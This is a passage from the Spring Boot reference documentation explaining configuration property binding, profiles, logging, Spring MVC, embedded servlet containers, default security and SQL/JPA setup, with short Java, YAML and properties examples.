annotation:\n\n[source,java,indent=0]\n----\n\t@Configuration\n\t@EnableConfigurationProperties(ConnectionSettings.class)\n\tpublic class MyConfiguration {\n\t}\n----\n\n\n\n[[boot-features-external-config-relaxed-binding]]\n==== Relaxed binding\nSpring Boot uses some relaxed rules for binding `Environment` properties to\n`@ConfigurationProperties` beans, so there doesn't need to be an exact match between\nthe `Environment` property name and the bean property name. Common examples where this\nis useful include underscore separated (e.g. `context_path` binds to `contextPath`), and\ncapitalized (e.g. `PORT` binds to `port`) environment properties.\n\nSpring will attempt to coerce the external application properties to the right type when\nit binds to the `@ConfigurationProperties` beans. If you need custom type conversion you\ncan provide a `ConversionService` bean (with bean id `conversionService`) or custom\nproperty editors (via a `CustomEditorConfigurer` bean).\n\n\n\n[[boot-features-external-config-validation]]\n==== @ConfigurationProperties Validation\nSpring Boot will attempt to validate external configuration, by default using JSR-303\n(if it is on the classpath). 
You can simply add JSR-303 `javax.validation` constraint\nannotations to your `@ConfigurationProperties` class:\n\n[source,java,indent=0]\n----\n\t@Component\n\t@ConfigurationProperties(prefix=\"connection\")\n\tpublic class ConnectionSettings {\n\n\t\t@NotNull\n\t\tprivate InetAddress remoteAddress;\n\n\t\t\/\/ ... getters and setters\n\n\t}\n----\n\nYou can also add a custom Spring `Validator` by creating a bean definition called\n`configurationPropertiesValidator`.\n\nTIP: The `spring-boot-actuator` module includes an endpoint that exposes all\n`@ConfigurationProperties` beans. Simply point your web browser to `\/configprops`\nor use the equivalent JMX endpoint. See the\n'<<production-ready-features.adoc#production-ready-endpoints, Production ready features>>'\nsection for details.\n\n\n[[boot-features-profiles]]\n== Profiles\nSpring Profiles provide a way to segregate parts of your application configuration and\nmake it only available in certain environments. Any `@Component` or `@Configuration` can\nbe marked with `@Profile` to limit when it is loaded:\n\n[source,java,indent=0]\n----\n\t@Configuration\n\t@Profile(\"production\")\n\tpublic class ProductionConfiguration {\n\n\t\t\/\/ ...\n\n\t}\n----\n\nIn the normal Spring way, you can use a `spring.profiles.active`\n`Environment` property to specify which profiles are active. You can\nspecify the property in any of the usual ways, for example you could\ninclude it in your `application.properties`:\n\n[source,properties,indent=0]\n----\n\tspring.profiles.active=dev,hsqldb\n----\n\nor specify it on the command line using the switch `--spring.profiles.active=dev,hsqldb`.\n\n\n\n[[boot-features-adding-active-profiles]]\n=== Adding active profiles\nThe `spring.profiles.active` property follows the same ordering rules as other\nproperties; the highest `PropertySource` will win. This means that you can specify\nactive profiles in `application.properties` then *replace* them using the command line\nswitch.\n\nSometimes it is useful to have profile specific properties that *add* to the active\nprofiles rather than replace them. The `spring.profiles.include` property can be used\nto unconditionally add active profiles. The `SpringApplication` entry point also has\na Java API for setting additional profiles (i.e. on top of those activated by the\n`spring.profiles.active` property): see the `setAdditionalProfiles()` method.\n\nFor example, when an application with the following properties is run using the switch\n`--spring.profiles.active=prod` the `proddb` and `prodmq` profiles will also be activated:\n\n[source,yaml,indent=0]\n----\n\t---\n\tmy.property: fromyamlfile\n\t---\n\tspring.profiles: prod\n\tspring.profiles.include: proddb,prodmq\n----\n\nNOTE: Remember that the `spring.profiles` property can be defined in a YAML document\nto determine when this particular document is included in the configuration. See\n<<howto-change-configuration-depending-on-the-environment>> for more details.\n\n\n\n[[boot-features-programmatically-setting-profiles]]\n=== Programmatically setting profiles\nYou can programmatically set active profiles by calling\n`SpringApplication.setAdditionalProfiles(...)` before your application runs. 
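A minimal sketch, reusing the `MySpringConfiguration` class from the earlier examples:\n\n[source,java,indent=0]\n----\n\tpublic static void main(String[] args) {\n\t\tSpringApplication app = new SpringApplication(MySpringConfiguration.class);\n\t\t\/\/ adds ``prod'' on top of any profiles activated via spring.profiles.active\n\t\tapp.setAdditionalProfiles(\"prod\");\n\t\tapp.run(args);\n\t}\n----\n\n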
It is also\npossible to activate profiles using Spring's `ConfigurableEnvironment` interface.\n\n\n\n[[boot-features-profile-specific-configuration]]\n=== Profile specific configuration files\nProfile specific variants of both `application.properties` (or `application.yml`) and\nfiles referenced via `@ConfigurationProperties` are considered as files are loaded.\nSee '<<boot-features-external-config-profile-specific-properties>>' for details.\n\n\n\n[[boot-features-logging]]\n== Logging\nSpring Boot uses http:\/\/commons.apache.org\/logging[Commons Logging] for all internal\nlogging, but leaves the underlying log implementation open. Default configurations are\nprovided for\nhttp:\/\/docs.oracle.com\/javase\/7\/docs\/api\/java\/util\/logging\/package-summary.html[Java Util Logging],\nhttp:\/\/logging.apache.org\/log4j\/[Log4J] and\nhttp:\/\/logback.qos.ch\/[Logback].\nIn each case there is console output and file output (rotating, 10 Mb file size).\n\nBy default, if you use the ``Starter POMs'', Logback will be used for logging. Appropriate\nLogback routing is also included to ensure that dependent libraries that use\nJava Util Logging, Commons Logging, Log4J or SLF4J will all work correctly.\n\nTIP: There are a lot of logging frameworks available for Java. Don't worry if the above\nlist seems confusing; generally you won't need to change your logging dependencies and\nthe Spring Boot defaults will work just fine.\n\n\n\n[[boot-features-logging-format]]\n=== Log format\nThe default log output from Spring Boot looks like this:\n\n[indent=0]\n----\n2014-03-05 10:57:51.112 INFO 45469 --- [ main] org.apache.catalina.core.StandardEngine : Starting Servlet Engine: Apache Tomcat\/7.0.52\n2014-03-05 10:57:51.253 INFO 45469 --- [ost-startStop-1] o.a.c.c.C.[Tomcat].[localhost].[\/] : Initializing Spring embedded WebApplicationContext\n2014-03-05 10:57:51.253 INFO 45469 --- [ost-startStop-1] o.s.web.context.ContextLoader : Root WebApplicationContext: initialization completed in 1358 ms\n2014-03-05 10:57:51.698 INFO 45469 --- [ost-startStop-1] o.s.b.c.e.ServletRegistrationBean : Mapping servlet: 'dispatcherServlet' to [\/]\n2014-03-05 10:57:51.702 INFO 45469 --- [ost-startStop-1] o.s.b.c.embedded.FilterRegistrationBean : Mapping filter: 'hiddenHttpMethodFilter' to: [\/*]\n----\n\nThe following items are output:\n\n* Date and Time -- Millisecond precision and easily sortable.\n* Log Level -- `ERROR`, `WARN`, `INFO`, `DEBUG` or `TRACE`.\n* Process ID.\n* A `---` separator to distinguish the start of actual log messages.\n* Logger name -- This is usually the source class name (often abbreviated).\n* The log message.\n\n\n\n[[boot-features-logging-console-output]]\n=== Console output\nThe default log configuration will echo messages to the console as they are written. By\ndefault `ERROR`, `WARN` and `INFO` level messages are logged. To also log `DEBUG` level\nmessages to the console you can start your application with a `--debug` flag.\n\n[indent=0]\n----\n\t$ java -jar myapp.jar --debug\n----\n\nIf your terminal supports ANSI, color output will be used to aid readability.\n\n\n\n[[boot-features-logging-file-output]]\n=== File output\nBy default, log files are written to `spring.log` in your `temp` directory and rotate at\n10 Mb. You can easily customize the output folder by setting the `logging.path` property\n(for example in your `application.properties`). It is also possible to change the filename\nusing a `logging.file` property. 
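For example, in `application.properties` (the path and file name here are only illustrative):\n\n[source,properties,indent=0]\n----\n\t# write the rotating spring.log file to \/var\/log instead of the temp directory\n\tlogging.path=\/var\/log\n\t# ...or log to a specific file instead\n\t# logging.file=myapp.log\n----\n\n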
Note that if `logging.file` is used, then setting `logging.path` has no effect.\n\nAs with console output, `ERROR`, `WARN` and `INFO` level messages are logged by default.\n\n[[boot-features-custom-log-levels]]\n=== Log Levels\n\nAll the supported logging systems can have the logger levels set in the Spring\n`Environment` (so for example in `application.properties`) using ``logging.level.*=LEVEL''\nwhere ``LEVEL'' is one of TRACE, DEBUG, INFO, WARN, ERROR, FATAL, OFF. Example\n`application.properties`:\n\n[source,properties,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\tlogging.level.org.springframework.web: DEBUG\n\tlogging.level.org.hibernate: ERROR\n----\n\n\n\n[[boot-features-custom-log-configuration]]\n=== Custom log configuration\n\nThe various logging systems can be activated by including the appropriate libraries on\nthe classpath, and further customized by providing a suitable configuration file in the\nroot of the classpath, or in a location specified by the Spring `Environment` property\n`logging.config`. (Note however that since logging is initialized *before* the\n`ApplicationContext` is created, it isn't possible to control logging from\n`@PropertySources` in Spring `@Configuration` files. System properties and the\nconventional Spring Boot external configuration files work just fine.)\n\nDepending on your logging system, the following files will be loaded:\n\n|===\n|Logging System |Customization\n\n|Logback\n|`logback.xml`\n\n|Log4j\n|`log4j.properties` or `log4j.xml`\n\n|JDK (Java Util Logging)\n|`logging.properties`\n|===\n\nTo help with the customization some other properties are transferred from the Spring\n`Environment` to System properties:\n\n|===\n|Spring Environment |System Property |Comments\n\n|`logging.file`\n|`LOG_FILE`\n|Used in default log configuration if defined.\n\n|`logging.path`\n|`LOG_PATH`\n|Used in default log configuration if defined.\n\n|`PID`\n|`PID`\n|The current process ID (discovered if possible and when not already defined as an OS\n environment variable).\n|===\n\nAll the supported logging systems can consult System properties when parsing their\nconfiguration files. See the default configurations in `spring-boot.jar` for examples.\n\nWARNING: There are known classloading issues with Java Util Logging that cause problems\nwhen running from an ``executable jar''. We recommend that you avoid it if at all\npossible.\n\n\n\n[[boot-features-developing-web-applications]]\n== Developing web applications\nSpring Boot is well suited for web application development. You can easily create a\nself-contained HTTP server using embedded Tomcat or Jetty. Most web applications will\nuse the `spring-boot-starter-web` module to get up and running quickly.\n\nIf you haven't yet developed a Spring Boot web application you can follow the\n\"Hello World!\" example in the\n'<<getting-started.adoc#getting-started-first-application, Getting started>>' section.\n\n\n\n[[boot-features-spring-mvc]]\n=== The ``Spring Web MVC framework''\nThe Spring Web MVC framework (often referred to as simply ``Spring MVC'') is a rich\n``model view controller'' web framework. Spring MVC lets you create special `@Controller`\nor `@RestController` beans to handle incoming HTTP requests. 
Methods in your controller\nare mapped to HTTP using `@RequestMapping` annotations.\n\nHere is a typical example `@RestController` to serve JSON data:\n\n[source,java,indent=0]\n----\n\t@RestController\n\t@RequestMapping(value=\"\/users\")\n\tpublic class MyRestController {\n\n\t\t@RequestMapping(value=\"\/{user}\", method=RequestMethod.GET)\n\t\tpublic User getUser(@PathVariable Long user) {\n\t\t\t\/\/ ...\n\t\t}\n\n\t\t@RequestMapping(value=\"\/{user}\/customers\", method=RequestMethod.GET)\n\t\tpublic List<Customer> getUserCustomers(@PathVariable Long user) {\n\t\t\t\/\/ ...\n\t\t}\n\n\t\t@RequestMapping(value=\"\/{user}\", method=RequestMethod.DELETE)\n\t\tpublic User deleteUser(@PathVariable Long user) {\n\t\t\t\/\/ ...\n\t\t}\n\n\t}\n----\n\nSpring MVC is part of the core Spring Framework and detailed information is available in\nthe {spring-reference}#mvc[reference documentation]. There are also several guides\navailable at http:\/\/spring.io\/guides that cover Spring MVC.\n\n\n\n[[boot-features-spring-mvc-auto-configuration]]\n==== Spring MVC auto-configuration\nSpring Boot provides auto-configuration for Spring MVC that works well with most\napplications.\n\nThe auto-configuration adds the following features on top of Spring's defaults:\n\n* Inclusion of `ContentNegotiatingViewResolver` and `BeanNameViewResolver` beans.\n* Support for serving static resources, including support for WebJars (see below).\n* Automatic registration of `Converter`, `GenericConverter`, `Formatter` beans.\n* Support for `HttpMessageConverters` (see below).\n* Automatic registration of `MessageCodesResolver` (see below).\n* Static `index.html` support.\n* Custom `Favicon` support.\n\nIf you want to take complete control of Spring MVC, you can add your own `@Configuration`\nannotated with `@EnableWebMvc`. If you want to keep Spring Boot MVC features, and\nyou just want to add additional {spring-reference}#mvc[MVC configuration] (interceptors,\nformatters, view controllers etc.) you can add your own `@Bean` of type\n`WebMvcConfigurerAdapter`, but *without* `@EnableWebMvc`.\n\n\n\n[[boot-features-spring-mvc-message-converters]]\n==== HttpMessageConverters\nSpring MVC uses the `HttpMessageConverter` interface to convert HTTP requests and\nresponses. Sensible defaults are included out of the box, for example Objects can be\nautomatically converted to JSON (using the Jackson library) or XML (using JAXB).\n\nIf you need to add or customize converters you can use Spring Boot's\n`HttpMessageConverters` class:\n\n[source,java,indent=0]\n----\n\timport org.springframework.boot.autoconfigure.web.HttpMessageConverters;\n\timport org.springframework.context.annotation.*;\n\timport org.springframework.http.converter.*;\n\n\t@Configuration\n\tpublic class MyConfiguration {\n\n\t\t@Bean\n\t\tpublic HttpMessageConverters customConverters() {\n\t\t\tHttpMessageConverter<?> additional = ...\n\t\t\tHttpMessageConverter<?> another = ...\n\t\t\treturn new HttpMessageConverters(additional, another);\n\t\t}\n\n\t}\n----\n\n[[boot-features-spring-message-codes]]\n==== MessageCodesResolver\nSpring MVC has a strategy for generating error codes for rendering error messages\nfrom binding errors: `MessageCodesResolver`. 
Spring Boot will create one for you if\nyou set the `spring.mvc.message-codes-resolver.format` property to `PREFIX_ERROR_CODE` or\n`POSTFIX_ERROR_CODE` (see the enumeration in `DefaultMessageCodesResolver.Format`).\n\n\n\n[[boot-features-spring-mvc-static-content]]\n==== Static Content\nBy default Spring Boot will serve static content from a folder called `\/static` (or\n`\/public` or `\/resources` or `\/META-INF\/resources`) in the classpath or from the root\nof the `ServletContext`. It uses the `ResourceHttpRequestHandler` from Spring MVC so you\ncan modify that behavior by adding your own `WebMvcConfigurerAdapter` and overriding the\n`addResourceHandlers` method.\n\nIn a stand-alone web application the default servlet from the container is also\nenabled, and acts as a fallback, serving content from the root of the `ServletContext` if\nSpring decides not to handle it. Most of the time this will not happen (unless you modify\nthe default MVC configuration) because Spring will always be able to handle requests\nthrough the `DispatcherServlet`.\n\nIn addition to the ``standard'' static resource locations above, a special case is made for\nhttp:\/\/www.webjars.org\/[Webjars content]. Any resources with a path in `\/webjars\/**` will\nbe served from jar files if they are packaged in the Webjars format.\n\nTIP: Do not use the `src\/main\/webapp` folder if your application will be packaged as a\njar. Although this folder is a common standard, it will *only* work with war packaging\nand it will be silently ignored by most build tools if you generate a jar.\n\n\n\n[[boot-features-spring-mvc-template-engines]]\n==== Template engines\n\nAs well as REST web services, you can also use Spring MVC to serve dynamic HTML content.\nSpring MVC supports a variety of templating technologies including Velocity, FreeMarker\nand JSPs. Many other templating engines also ship their own Spring MVC integrations.\n\nSpring Boot includes auto-configuration support for the following templating engines:\n\n * http:\/\/freemarker.org\/docs\/[FreeMarker]\n * http:\/\/beta.groovy-lang.org\/docs\/groovy-2.3.0\/html\/documentation\/markup-template-engine.html[Groovy]\n * http:\/\/www.thymeleaf.org[Thymeleaf]\n * http:\/\/velocity.apache.org[Velocity]\n\nWhen you're using one of these templating engines with the default configuration, your templates\nwill be picked up automatically from `src\/main\/resources\/templates`.\n\nTIP: JSPs should be avoided if possible; there are several\n<<boot-features-jsp-limitations, known limitations>> when using them with embedded\nservlet containers.\n\n\n\n[[boot-features-error-handling]]\n==== Error Handling\nSpring Boot provides an `\/error` mapping by default that handles all errors in a\nsensible way, and it is registered as a ``global'' error page in the servlet container.\nFor machine clients it will produce a JSON response with details of the error, the HTTP\nstatus and the exception message. For browser clients there is a ``whitelabel'' error\nview that renders the same data in HTML format (to customize it just add a `View` that\nresolves to ``error''). To replace the default behavior completely you can implement\n`ErrorController` and register a bean definition of that type, or simply add a bean\nof type `ErrorAttributes` to use the existing mechanism but replace the contents.\n\nIf you want more specific error pages for some conditions, the embedded servlet containers\nsupport a uniform Java DSL for customizing the error handling. 
For example:\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t@Bean\n\tpublic EmbeddedServletContainerCustomizer containerCustomizer() {\n\t\treturn new MyCustomizer();\n\t}\n\n\t\/\/ ...\n\n\tprivate static class MyCustomizer implements EmbeddedServletContainerCustomizer {\n\n\t\t@Override\n\t\tpublic void customize(ConfigurableEmbeddedServletContainer container) {\n\t\t\tcontainer.addErrorPages(new ErrorPage(HttpStatus.BAD_REQUEST, \"\/400\"));\n\t\t}\n\n\t}\n----\n\nYou can also use regular Spring MVC features like http:\/\/docs.spring.io\/spring\/docs\/current\/spring-framework-reference\/htmlsingle\/#mvc-exception-handlers[`@ExceptionHandler`\nmethods] and http:\/\/docs.spring.io\/spring\/docs\/current\/spring-framework-reference\/htmlsingle\/#mvc-ann-controller-advice[`@ControllerAdvice`].\nThe `ErrorController` will then pick up any unhandled exceptions.\n\n\n\n[[boot-features-embedded-container]]\n=== Embedded servlet container support\nSpring Boot includes support for embedded Tomcat and Jetty servers. Most developers will\nsimply use the appropriate ``Starter POM'' to obtain a fully configured instance. By\ndefault both Tomcat and Jetty will listen for HTTP requests on port `8080`.\n\n\n\n[[boot-features-embedded-container-servlets-and-filters]]\n==== Servlets and Filters\nWhen using an embedded servlet container you can register Servlets and Filters directly as\nSpring beans. This can be particularly convenient if you want to refer to a value from\nyour `application.properties` during configuration.\n\nBy default, if the context contains only a single Servlet it will be mapped to `\/`. In\nthe case of multiple Servlet beans the bean name will be used as a path prefix. Filters\nwill map to `\/*`.\n\nIf convention-based mapping is not flexible enough you can use the\n`ServletRegistrationBean` and `FilterRegistrationBean` classes for complete control. You\ncan also register items directly if your bean implements the `ServletContextInitializer`\ninterface.\n\n\n\n[[boot-features-embedded-container-application-context]]\n==== The EmbeddedWebApplicationContext\nUnder the hood Spring Boot uses a new type of `ApplicationContext` for embedded\nservlet container support. The `EmbeddedWebApplicationContext` is a special\ntype of `WebApplicationContext` that bootstraps itself by searching for a single\n`EmbeddedServletContainerFactory` bean. Usually a `TomcatEmbeddedServletContainerFactory`\nor `JettyEmbeddedServletContainerFactory` will have been auto-configured.\n\nNOTE: You usually won't need to be aware of these implementation classes. Most\napplications will be auto-configured and the appropriate `ApplicationContext` and\n`EmbeddedServletContainerFactory` will be created on your behalf.\n\n\n\n[[boot-features-customizing-embedded-containers]]\n==== Customizing embedded servlet containers\nCommon servlet container settings can be configured using Spring `Environment`\nproperties. 
Usually you would define the properties in your `application.properties`\nfile.\n\nCommon server settings include:\n\n* `server.port` -- The listen port for incoming HTTP requests.\n* `server.address` -- The interface address to bind to.\n* `server.sessionTimeout` -- A session timeout.\n\nSee the {sc-spring-boot-autoconfigure}\/web\/ServerProperties.{sc-ext}[`ServerProperties`]\nclass for a complete list.\n\n\n\n[[boot-features-programmatic-embedded-container-customization]]\n===== Programmatic customization\nIf you need to configure your embedded servlet container programmatically you can register\na Spring bean that implements the `EmbeddedServletContainerCustomizer` interface.\n`EmbeddedServletContainerCustomizer` provides access to the\n`ConfigurableEmbeddedServletContainer`, which includes numerous customization setter\nmethods.\n\n[source,java,indent=0]\n----\n\timport org.springframework.boot.context.embedded.*;\n\timport org.springframework.stereotype.Component;\n\n\t@Component\n\tpublic class CustomizationBean implements EmbeddedServletContainerCustomizer {\n\n\t\t@Override\n\t\tpublic void customize(ConfigurableEmbeddedServletContainer container) {\n\t\t\tcontainer.setPort(9000);\n\t\t}\n\n\t}\n----\n\n\n\n[[boot-features-customizing-configurableembeddedservletcontainerfactory-directly]]\n===== Customizing ConfigurableEmbeddedServletContainer directly\nIf the above customization techniques are too limited, you can register the\n`TomcatEmbeddedServletContainerFactory` or `JettyEmbeddedServletContainerFactory` bean\nyourself.\n\n[source,java,indent=0]\n----\n\t@Bean\n\tpublic EmbeddedServletContainerFactory servletContainer() {\n\t\tTomcatEmbeddedServletContainerFactory factory = new TomcatEmbeddedServletContainerFactory();\n\t\tfactory.setPort(9000);\n\t\tfactory.setSessionTimeout(10, TimeUnit.MINUTES);\n\t\tfactory.addErrorPages(new ErrorPage(HttpStatus.NOT_FOUND, \"\/notfound.html\"));\n\t\treturn factory;\n\t}\n----\n\nSetters are provided for many configuration options. Several protected method\n``hooks'' are also provided should you need to do something more exotic. See the\nsource code documentation for details.\n\n\n\n[[boot-features-jsp-limitations]]\n==== JSP limitations\nWhen running a Spring Boot application that uses an embedded servlet container (and is\npackaged as an executable archive), there are some limitations in the JSP support.\n\n* With Tomcat it should work if you use war packaging, i.e. an executable war will work,\n and will also be deployable to a standard container (not limited to, but including\n Tomcat). An executable jar will not work because of a hard coded file pattern in Tomcat.\n\n* Jetty does not currently work as an embedded container with JSPs.\n\nThere is a {github-code}\/spring-boot-samples\/spring-boot-sample-web-jsp[JSP sample] so\nyou can see how to set things up.\n\n\n\n[[boot-features-security]]\n== Security\nIf Spring Security is on the classpath then web applications will be secure by default\nwith ``basic'' authentication on all HTTP endpoints. 
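One way to get Spring Security onto the classpath is the corresponding ``Starter POM'' (a sketch, following the earlier dependency examples):\n\n[source,xml,indent=0]\n----\n\t<dependency>\n\t\t<groupId>org.springframework.boot<\/groupId>\n\t\t<artifactId>spring-boot-starter-security<\/artifactId>\n\t<\/dependency>\n----\n\n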
To add method-level security to a web\napplication you can also add `@EnableGlobalMethodSecurity` with your desired settings.\nAdditional information can be found in the {spring-security-reference}#jc-method[Spring\nSecurity Reference].\n\nThe default `AuthenticationManager` has a single user (``user'' username and random\npassword, printed at INFO level when the application starts up):\n\n[indent=0]\n----\n\tUsing default security password: 78fa095d-3f4c-48b1-ad50-e24c31d5cf35\n----\n\nYou can change the password by providing a `security.user.password`. This and other\nuseful properties are externalized via\n{sc-spring-boot-autoconfigure}\/security\/SecurityProperties.{sc-ext}[`SecurityProperties`]\n(properties prefix \"security\").\n\nThe default security configuration is implemented in `SecurityAutoConfiguration` and in\nthe classes imported from there (`SpringBootWebSecurityConfiguration` for web security\nand `AuthenticationManagerConfiguration` for authentication configuration, which is also\nrelevant in non-web applications). To switch off the Boot default configuration\ncompletely in a web application you can add a bean with `@EnableWebSecurity`. To customize\nit you normally use external properties and beans of type `WebSecurityConfigurerAdapter` (e.g. to\nadd form-based login). There are several secure applications in the\n{github-code}\/spring-boot-samples\/[Spring Boot samples] to get you started with common\nuse cases.\n\nThe basic features you get out of the box in a web application are:\n\n* An `AuthenticationManager` bean with in-memory store and a single user (see\n `SecurityProperties.User` for the properties of the user).\n* Ignored (insecure) paths for common static resource locations (`\/css\/**`, `\/js\/**`,\n `\/images\/**` and `**\/favicon.ico`).\n* HTTP Basic security for all other endpoints.\n* Security events published to Spring's `ApplicationEventPublisher` (successful and\n unsuccessful authentication and access denied).\n* Common low-level features (HSTS, XSS, CSRF, caching) provided by Spring Security are\n on by default.\n\nAll of the above can be switched on and off or modified using external properties\n(`security.*`). To override the access rules without changing any other autoconfigured\nfeatures add a `@Bean` of type `WebSecurityConfigurerAdapter` with\n`@Order(SecurityProperties.ACCESS_OVERRIDE_ORDER)`.\n\nIf the Actuator is also in use, you will find:\n\n* The management endpoints are secure even if the application endpoints are insecure.\n* Security events are transformed into `AuditEvents` and published to the `AuditService`.\n* The default user will have the `ADMIN` role as well as the `USER` role.\n\nThe Actuator security features can be modified using external properties\n(`management.security.*`). To override the application access rules\nadd a `@Bean` of type `WebSecurityConfigurerAdapter` and use\n`@Order(SecurityProperties.ACCESS_OVERRIDE_ORDER)` if you _don't_ want to override\nthe actuator access rules, or `@Order(ManagementServerProperties.ACCESS_OVERRIDE_ORDER)`\nif you _do_ want to override the actuator access rules.\n\n\n\n\n[[boot-features-sql]]\n== Working with SQL databases\nThe Spring Framework provides extensive support for working with SQL databases. From\ndirect JDBC access using `JdbcTemplate` to complete ``object relational mapping''\ntechnologies such as Hibernate. 
Spring Data provides an additional level of functionality,\ncreating `Repository` implementations directly from interfaces and using conventions to\ngenerate queries from your method names.\n\n\n\n[[boot-features-configure-datasource]]\n=== Configure a DataSource\nJava's `javax.sql.DataSource` interface provides a standard method of working with\ndatabase connections. Traditionally a DataSource uses a `URL` along with some\ncredentials to establish a database connection.\n\n\n\n[[boot-features-embedded-database-support]]\n==== Embedded Database Support\nIt's often convenient to develop applications using an in-memory embedded database.\nObviously, in-memory databases do not provide persistent storage; you will need to\npopulate your database when your application starts and be prepared to throw away\ndata when your application ends.\n\nTIP: The ``How-to'' section includes a '<<howto.adoc#howto-database-initialization, section\non how to initialize a database>>'.\n\nSpring Boot can auto-configure embedded http:\/\/www.h2database.com[H2],\nhttp:\/\/hsqldb.org\/[HSQL] and http:\/\/db.apache.org\/derby\/[Derby] databases. You don't\nneed to provide any connection URLs; simply include a build dependency to the\nembedded database that you want to use.\n\nFor example, typical POM dependencies would be:\n\n[source,xml,indent=0]\n----\n\t<dependency>\n\t\t<groupId>org.springframework.boot<\/groupId>\n\t\t<artifactId>spring-boot-starter-data-jpa<\/artifactId>\n\t<\/dependency>\n\t<dependency>\n\t\t<groupId>org.hsqldb<\/groupId>\n\t\t<artifactId>hsqldb<\/artifactId>\n\t\t<scope>runtime<\/scope>\n\t<\/dependency>\n----\n\nNOTE: You need a dependency on `spring-jdbc` for an embedded database to be\nauto-configured. In this example it's pulled in transitively via\n`spring-boot-starter-data-jpa`.\n\n\n\n[[boot-features-connect-to-production-database]]\n==== Connection to a production database\nProduction database connections can also be auto-configured using a pooling\n`DataSource`. Here's the algorithm for choosing a specific implementation.\n\n* We prefer the Tomcat pooling `DataSource` for its performance and concurrency, so if\n that is available we always choose it.\n* If commons-dbcp is available we will use that, but we don't recommend it in production.\n\nIf you use the `spring-boot-starter-jdbc` or `spring-boot-starter-data-jpa`\n``starter POMs'' you will automatically get a dependency to `tomcat-jdbc`.\n\nNOTE: Additional connection pools can always be configured manually. If you define your\nown `DataSource` bean, auto-configuration will not occur.\n\nDataSource configuration is controlled by external configuration properties in\n`spring.datasource.*`. For example, you might declare the following section\nin `application.properties`:\n\n[source,properties,indent=0]\n----\n\tspring.datasource.url=jdbc:mysql:\/\/localhost\/test\n\tspring.datasource.username=dbuser\n\tspring.datasource.password=dbpass\n\tspring.datasource.driverClassName=com.mysql.jdbc.Driver\n----\n\nSee {sc-spring-boot-autoconfigure}\/jdbc\/DataSourceProperties.{sc-ext}[`DataSourceProperties`]\nfor more of the supported options.\n\nNOTE: For a pooling `DataSource` to be created we need to be able to verify that a valid\n`Driver` class is available, so we check for that before doing anything. I.e. 
if you set\n`spring.datasource.driverClassName=com.mysql.jdbc.Driver` then that class has to be\nloadable.\n\n[[boot-features-using-jdbc-template]]\n=== Using JdbcTemplate\nSpring's `JdbcTemplate` and `NamedParameterJdbcTemplate` classes are auto-configured and\nyou can use `@Autowired` to inject them directly into your own beans:\n\n[source,java,indent=0]\n----\n\timport org.springframework.beans.factory.annotation.Autowired;\n\timport org.springframework.jdbc.core.JdbcTemplate;\n\timport org.springframework.stereotype.Component;\n\n\t@Component\n\tpublic class MyBean {\n\n\t\tprivate final JdbcTemplate jdbcTemplate;\n\n\t\t@Autowired\n\t\tpublic MyBean(JdbcTemplate jdbcTemplate) {\n\t\t\tthis.jdbcTemplate = jdbcTemplate;\n\t\t}\n\n\t\t\/\/ ...\n\n\t}\n----\n\n\n\n[[boot-features-jpa-and-spring-data]]\n=== JPA and ``Spring Data''\nThe Java Persistence API is a standard technology that allows you to ``map'' objects to\nrelational databases. The `spring-boot-starter-data-jpa` POM provides a quick way to get\nstarted. It provides the following key dependencies:\n\n* Hibernate -- One of the most popular JPA implementations.\n* Spring Data JPA -- Makes it easy to implement JPA-based repositories.\n* Spring ORMs -- Core ORM support from the Spring Framework.\n\nTIP: We won't go into too many details of JPA or Spring Data here. You can follow the\nhttp:\/\/spring.io\/guides\/gs\/accessing-data-jpa\/[``Accessing Data with JPA''] guide from\nhttp:\/\/spring.io and read the http:\/\/projects.spring.io\/spring-data-jpa\/[Spring Data JPA]\nand http:\/\/hibernate.org\/orm\/documentation\/[Hibernate] reference documentation.\n\n\n\n[[boot-features-entity-classes]]\n==== Entity Classes\nTraditionally, JPA ``Entity'' classes are specified in a `persistence.xml` file. With\nSpring Boot this file is not necessary and instead ``Entity Scanning'' is used. By\ndefault all packages below your main configuration class (the one annotated with\n`@EnableAutoConfiguration`) will be searched.\n\nAny classes annotated with `@Entity`, `@Embeddable` or `@MappedSuperclass` will be\nconsidered. A typical entity class would look something like this:\n\n[source,java,indent=0]\n----\n\tpackage com.example.myapp.domain;\n\n\timport java.io.Serializable;\n\timport javax.persistence.*;\n\n\t@Entity\n\tpublic class City implements Serializable {\n\n\t\t@Id\n\t\t@GeneratedValue\n\t\tprivate Long id;\n\n\t\t@Column(nullable = false)\n\t\tprivate String name;\n\n\t\t@Column(nullable = false)\n\t\tprivate String state;\n\n\t\t\/\/ ... additional members, often include @OneToMany mappings\n\n\t\tprotected City() {\n\t\t\t\/\/ no-args constructor required by JPA spec\n\t\t\t\/\/ this one is protected since it shouldn't be used directly\n\t\t}\n\n\t\tpublic City(String name, String state) {\n\t\t\tthis.name = name;\n\t\t\tthis.state = state;\n\t\t}\n\n\t\tpublic String getName() {\n\t\t\treturn this.name;\n\t\t}\n\n\t\tpublic String getState() {\n\t\t\treturn this.state;\n\t\t}\n\n\t\t\/\/ ... etc\n\n\t}\n----\n\nTIP: You can customize entity scanning locations using the `@EntityScan` annotation.\nSee the '<<howto.adoc#howto-separate-entity-definitions-from-spring-configuration>>'\nhow-to.\n\n\n[[boot-features-spring-data-jpa-repositories]]\n==== Spring Data JPA Repositories\nSpring Data JPA repositories are interfaces that you can define to access data. JPA\nqueries are created automatically from your method names. 
For example, a `CityRepository`\ninterface might declare a `findAllByState(String state)` method to find all cities\nin a given state.\n\nFor more complex queries you can annotate your method using Spring Data's\n{spring-data-javadoc}\/repository\/Query.html[`Query`] annotation.\n\nSpring Data repositories usually extend from the\n{spring-data-commons-javadoc}\/repository\/Repository.html[`Repository`] or\n{spring-data-commons-javadoc}\/repository\/CrudRepository.html[`CrudRepository`] interfaces. If you are using\nauto-configuration, repositories will be searched from the package containing your\nmain configuration class (the one annotated with `@EnableAutoConfiguration`) down.\n\nHere is a typical Spring Data repository:\n\n[source,java,indent=0]\n----\n\tpackage com.example.myapp.domain;\n\n\timport org.springframework.data.domain.*;\n\timport org.springframework.data.repository.*;\n\n\tpublic interface CityRepository extends Repository<City, Long> {\n\n\t\tPage<City> findAll(Pageable pageable);\n\n\t\tCity findByNameAndCountryAllIgnoringCase(String name, String country);\n\n\t}\n----\n\nTIP: We have barely scratched the surface of Spring Data JPA. For complete details check\ntheir http:\/\/projects.spring.io\/spring-data-jpa\/[reference documentation].\n\n\n\n[[boot-features-creating-and-dropping-jpa-databases]]\n==== Creating and dropping JPA databases\nBy default a JPA database will be automatically created *only* if you use 